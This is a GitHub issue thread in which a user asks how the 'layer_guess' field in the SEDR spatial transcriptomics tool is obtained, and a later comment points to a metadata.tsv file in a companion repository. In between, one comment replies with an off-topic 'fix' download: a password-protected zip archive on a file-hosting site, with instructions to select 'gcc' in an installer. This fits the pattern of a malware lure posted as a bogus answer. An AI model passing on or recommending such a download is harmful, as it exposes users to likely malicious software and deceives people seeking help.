### ISSUE TITLE
layer_guess

### ISSUE THREAD

**Issue by oooo111** [JinmiaoChenLab/SEDR#10]
How is layer_guess obtained, and why is layer_guess not present in my adata?"

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oooo111** [comment]
Sorry, I don’t quite understand your methods. Could you explain in more detail how to implement them?

**Comment by Xuhang01** [comment]
You can find the layer_guess information in this file:  https://github.com/JinmiaoChenLab/SEDR_analyses/tree/master/data/DLPFC/151507/metadata.tsv.
